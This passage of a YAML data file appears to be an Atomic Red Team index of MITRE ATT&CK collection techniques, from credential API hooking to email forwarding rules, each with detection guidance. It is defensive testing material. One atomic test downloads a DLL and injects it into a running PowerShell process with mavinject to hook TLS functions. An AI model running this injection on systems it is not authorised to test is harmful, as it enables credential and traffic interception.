+ - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ source_name: EyeofRa Detecting Hooking June 2017
+ - url: http://www.gmer.net/
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ source_name: GMER Rootkits
+ - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ source_name: Microsoft Process Snapshot
+ - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ source_name: StackExchange Hooks Jul 2012
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Credential API Hooking
+ description: |
+ Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+ * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017)
+ * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-03-24T21:29:13.565Z'
+ created: '2020-02-11T19:01:15.930Z'
+ x_mitre_data_sources:
+ - Windows event logs
+ - Process monitoring
+ - Loaded DLLs
+ - DLL monitoring
+ - Binary file metadata
+ - API monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ identifier: T1056.004
+ atomic_tests:
+ - name: Hook PowerShell TLS Encrypt/Decrypt Messages
+ auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
+ description: 'Hooks functions in PowerShell to read TLS Communications
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_name:
+ description: Dll To Inject
+ type: Path
+ default: PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll
+ server_name:
+ description: TLS Server To Test Get Request
+ type: Url
+ default: https://www.example.com
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name})
+
+'
+ prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}"
+ executor:
+ command: |
+ mavinject $pid /INJECTRUNNING #{file_name}
+ curl #{server_name}
+ name: powershell
+ elevation_required: true
+ T1074:
+ technique:
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Data Staged
+ description: |-
+ Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
+
+ In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
+
+ Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1074
+ url: https://attack.mitre.org/techniques/T1074
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-09-14T19:48:08.180Z'
+ created: '2017-05-31T21:30:58.938Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure
+ x_mitre_detection: |-
+ Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
+
+ Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.2'
+ atomic_tests: []
+ T1530:
+ technique:
+ id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
+ description: |-
+ Adversaries may access data objects from improperly secured cloud storage.
+
+ Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)
+
+ Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.
+ name: Data from Cloud Storage Object
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - external_id: T1530
+ source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1530
+ - source_name: Amazon S3 Security, 2019
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/
+ description: Amazon. (2019, May 17). How can I secure the files in my Amazon
+ S3 bucket?. Retrieved October 4, 2019.
+ - source_name: Microsoft Azure Storage Security, 2019
+ url: https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide
+ description: Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20).
+ Azure Storage security guide. Retrieved October 4, 2019.
+ - source_name: Google Cloud Storage Best Practices, 2019
+ url: https://cloud.google.com/storage/docs/best-practices
+ description: Google. (2019, September 16). Best practices for Cloud Storage.
+ Retrieved October 4, 2019.
+ - source_name: Trend Micro S3 Exposed PII, 2017
+ url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
+ description: Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed
+ Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.
+ - source_name: Wired Magecart S3 Buckets, 2019
+ url: https://www.wired.com/story/magecart-amazon-cloud-hacks/
+ description: 'Barrett, B.. (2019, July 11). Hack Brief: A Card-Skimming Hacker
+ Group Hit 17K Domains—and Counting. Retrieved October 4, 2019.'
+ - source_name: HIPAA Journal S3 Breach, 2017
+ url: https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/
+ description: HIPAA Journal. (2017, October 11). 47GB of Medical Records and
+ Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-07-09T14:02:05.276Z'
+ created: '2019-08-30T18:07:27.741Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Netskope
+ - Praetorian
+ x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
+ service. Activity originating from unexpected sources may indicate improper
+ permissions are set that is allowing access to data. Additionally, detecting
+ failed attempts by a user for a certain object, followed by escalation of
+ privileges by the same user, and access to the same object may be an indication
+ of suspicious activity.
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_permissions_required:
+ - User
+ atomic_tests: []
+ T1602:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1602
+ url: https://attack.mitre.org/techniques/T1602
+ - source_name: US-CERT-TA18-106A
+ url: https://www.us-cert.gov/ncas/alerts/TA18-106A
+ description: US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored
+ Cyber Actors Targeting Network Infrastructure Devices. Retrieved October
+ 19, 2020.
+ - source_name: US-CERT TA17-156A SNMP Abuse 2017
+ url: https://us-cert.cisa.gov/ncas/alerts/TA17-156A
+ description: US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved
+ October 19, 2020.
+ - source_name: Cisco Advisory SNMP v3 Authentication Vulnerabilities
+ url: https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3
+ description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
+ of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
+ 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Data from Configuration Repository
+ description: |-
+ Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
+
+ Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
+ id: attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-22T02:26:44.566Z'
+ created: '2020-10-19T23:46:13.931Z'
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
+ or networks that solicits and obtains the configuration information of the
+ queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)'
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
+ T1213:
+ technique:
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1213
+ url: https://attack.mitre.org/techniques/T1213
+ - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ source_name: Microsoft SharePoint Logging
+ - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ source_name: Atlassian Confluence Logging
+ description: |-
+ Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.
+
+ The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
+
+ * Policies, procedures, and standards
+ * Physical / logical network diagrams
+ * System architecture diagrams
+ * Technical system documentation
+ * Testing / development credentials
+ * Work / project schedules
+ * Source code snippets
+ * Links to network shares and other internal resources
+
+ Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.
+ name: Data from Information Repositories
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-12T12:16:55.085Z'
+ created: '2018-04-18T17:59:24.739Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '3.0'
+ x_mitre_contributors:
+ - Praetorian
+ - Milos Stojadinovic
+ x_mitre_data_sources:
+ - OAuth audit logs
+ - Application logs
+ - Authentication logs
+ - Data loss prevention
+ - Third-party application logs
+ x_mitre_detection: |-
+ As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
+
+ The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - SaaS
+ - Office 365
+ atomic_tests: []
+ T1005:
+ technique:
+ created: '2017-05-31T21:30:20.537Z'
+ modified: '2020-05-26T19:21:25.974Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1005
+ external_id: T1005
+ description: |
+ Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
+
+ Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
+ name: Data from Local System
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: Monitor processes and command-line arguments for actions
+ that could be taken to collect files from a system. Remote access tools with
+ built-in features may interact directly with the Windows API to gather data.
+ Data may also be acquired through Windows system management tools such as
+ [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_system_requirements:
+ - Privileges to access certain files and directories
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_is_subtechnique: false
+ atomic_tests: []
+ T1039:
+ technique:
+ id: attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Data from Network Shared Drive
+ description: Adversaries may search network shares on computers they have compromised
+ to find files of interest. Sensitive data can be collected from remote systems
+ via shared network drives (host shared directory, network file server, etc.)
+ that are accessible from the current system prior to Exfiltration. Interactive
+ command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
+ may be used to gather information.
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1039
+ url: https://attack.mitre.org/techniques/T1039
+ - external_id: CAPEC-639
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/639.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-24T15:42:44.026Z'
+ created: '2017-05-31T21:30:41.022Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_system_requirements:
+ - Privileges to access network shared drive
+ x_mitre_detection: Monitor processes and command-line arguments for actions
+ that could be taken to collect files from a network share. Remote access tools
+ with built-in features may interact directly with the Windows API to gather
+ data. Data may also be acquired through Windows system management tools such
+ as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.2'
+ atomic_tests: []
+ T1025:
+ technique:
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Data from Removable Media
+ description: "Adversaries may search connected removable media on computers
+ they have compromised to find files of interest. Sensitive data can be collected
+ from any removable media (optical disk drive, USB memory, etc.) connected
+ to the compromised system prior to Exfiltration. Interactive command shells
+ may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
+ may be used to gather information. \n\nSome adversaries may also use [Automated
+ Collection](https://attack.mitre.org/techniques/T1119) on removable media."
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-24T15:44:46.584Z'
+ created: '2017-05-31T21:30:31.584Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_system_requirements:
+ - Privileges to access removable media drive and files
+ x_mitre_detection: Monitor processes and command-line arguments for actions
+ that could be taken to collect files from a system's connected removable media.
+ Remote access tools with built-in features may interact directly with the
+ Windows API to gather data. Data may also be acquired through Windows system
+ management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.1'
+ atomic_tests: []
+ T1114:
+ technique:
+ id: attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Email Collection
+ description: 'Adversaries may target user email to collect sensitive information.
+ Emails may contain sensitive data, including trade secrets or personal information,
+ that can prove valuable to adversaries. Adversaries can collect or forward
+ email from mail servers or clients. '
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1114
+ url: https://attack.mitre.org/techniques/T1114
+ - description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
+ Retrieved October 8, 2019.
+ url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-24T18:31:06.417Z'
+ created: '2017-05-31T21:31:25.454Z'
+ x_mitre_contributors:
+ - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - Office 365
+ x_mitre_detection: |-
+ There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
+
+ File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+
+ Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
+
+ Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
+ x_mitre_data_sources:
+ - Office 365 trace logs
+ - Mail server
+ - Email gateway
+ - Authentication logs
+ - File monitoring
+ - Process monitoring
+ - Process use of network
+ x_mitre_version: '2.1'
+ atomic_tests: []
+ T1114.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1114.003
+ url: https://attack.mitre.org/techniques/T1114/003
+ - source_name: US-CERT TA18-068A 2018
+ url: https://www.us-cert.gov/ncas/alerts/TA18-086A
+ description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
+ by Cyber Actors. Retrieved October 2, 2019.
+ - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
+ url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
+ Retrieved October 8, 2019.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Email Forwarding Rule
+ description: "Adversaries may setup email forwarding rules to collect sensitive
+ information. Adversaries may abuse email-forwarding rules to monitor the activities
+ of a victim, steal information, and further gain intelligence on the victim
+ or the victim’s organization to use as part of further exploits or operations.(Citation:
+ US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create
+ inbox rules for various email functions, including forwarding to a different
+ recipient. Messages can be forwarded to internal or external recipients, and
+ there are no restrictions limiting the extent of this rule. Administrators
+ may also create forwarding rules for user accounts with the same considerations
+ and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)
+ \n\nAny user or administrator within the organization (or adversary with valid
+ credentials) can create rules to automatically forward all received messages
+ to another recipient, forward emails to different locations based on the sender,
+ and more."
+ id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-19T22:43:45.509Z'
+ created: '2020-02-19T18:54:47.103Z'
+ x_mitre_contributors:
+ - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
+
+ Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
+ x_mitre_data_sources:
+ - Process use of network
+ - Process monitoring
+ - Email gateway
+ - Mail server
+ - Office 365 trace logs
+ x_mitre_platforms:
+ - Office 365
+ - Windows
+ atomic_tests: []
+ T1056.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1056.002
+ url: https://attack.mitre.org/techniques/T1056/002
+ - external_id: CAPEC-659
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/659.html
+ - url: https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html
+ description: Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits
+ Mackeeper. Retrieved July 3, 2017.
+ source_name: OSX Malware Exploits MacKeeper
+ - source_name: LogRhythm Do You Trust Oct 2014
+ url: https://logrhythm.com/blog/do-you-trust-your-computer/
+ description: Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved
+ December 17, 2018.
+ - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
+ description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware
+ is hungry for credentials. Retrieved July 3, 2017.
+ source_name: OSX Keydnap malware
+ - source_name: Enigma Phishing for Credentials Jan 2015
+ url: https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
+ description: 'Nelson, M. (2015, January 21). Phishing for Credentials: If
+ you want it, just ask!. Retrieved December 17, 2018.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: GUI Input Capture
+ description: "Adversaries may mimic common operating system GUI components to
+ prompt users for credentials with a seemingly legitimate prompt. When programs
+ are executed that need additional privileges than are present in the current
+ user context, it is common for the operating system to prompt the user for
+ proper credentials to authorize the elevated privileges for the task (ex:
+ [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries
+ may mimic this functionality to prompt users for credentials with a seemingly
+ legitimate prompt for a number of reasons that mimic normal usage, such as
+ a fake installer requiring additional access or a fake malware removal suite.(Citation:
+ OSX Malware Exploits MacKeeper) This type of prompt can be used to collect
+ credentials via various languages such as AppleScript(Citation: LogRhythm
+ Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation:
+ LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials
+ Jan 2015). "
